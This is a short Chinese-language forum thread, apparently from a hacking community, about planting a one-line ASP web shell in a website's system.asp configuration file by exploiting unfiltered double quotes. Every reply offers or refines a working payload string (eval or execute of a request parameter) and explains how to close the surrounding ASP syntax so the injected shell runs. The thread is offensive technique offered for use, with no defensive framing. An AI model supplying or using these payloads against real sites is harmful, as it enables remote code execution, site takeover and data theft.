http://www.t00ls.net/viewthread.php?tid=13901
一句话插入配置文件system.asp
没有过滤双引号,插入一句就行。
常规插法如下:
"%><%eval request("d")%><%
但金刀客这篇文件(http://www.cqzh.cn/post/328.html)为什么说
"%><%eval request("d")%><%s="
必须要加s=呢?
比如:
web_name="中国纺织网"
插入后:
web_name="中国纺织网"%><%eval request("d")%><%"
跟这样不就全闭合了吗?
还需要<%s="干嘛?直接<%闭合下面的不就行了。
=========
":eval request(9) //这多简单
=================
<%
webname="abc"
webhost="d:\abc\abc\www"
%>
插入"%><%eval request("d")%><%s="后就变成
<%
webname="abc"%><%eval request("d")%><%s=""
webhost="d:\abc\abc\www"
%>
============
test"%><%execute request("value")%><%a="test
